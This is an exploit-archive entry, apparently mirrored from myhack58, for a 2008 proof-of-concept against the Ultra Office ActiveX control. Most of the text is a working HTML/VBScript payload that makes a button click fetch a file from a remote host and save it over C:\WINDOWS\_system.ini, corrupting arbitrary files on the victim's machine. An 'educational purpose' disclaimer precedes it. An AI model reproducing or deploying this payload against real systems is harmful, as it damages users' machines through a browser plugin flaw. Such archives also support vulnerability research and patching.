ActiveX remote arbitrary file exploit-vulnerability warning-the black bar safety net

2008-09-01T00:00:00
ID MYHACK58:62200820226
Type myhack58
Reporter 佚名
Modified 2008-09-01T00:00:00

Description

Ultra Office ActiveX Control Remote Arbitrary File Corruption url: http://www.ultrashareware.com

Author: shinnai mail: shinnai[at]autistici[dot]org site: http://shinnai.altervista.org

This was written for educational purpose. Use it at your own risk. Author will be not responsible for any damage.

Tested on Windows XP Professional SP3 all patched, with Internet Explorer 7 ----------------------------------------------------------------------------- <object classid='clsid:0 0 9 8 9 8 8 8-BB72-4e31-A7C6-5F819C24D2F7' id='test'></object>

<input language=VBScript onclick=tryMe() type=button value='Click here to start the test'>

<script language='vbscript'> Sub tryMe dim remURL remURL = "http://SomeSite.com/SomeFile.doc" test. Open remURL, True test. Save "C:\WINDOWS\_system.ini", True End Sub </script>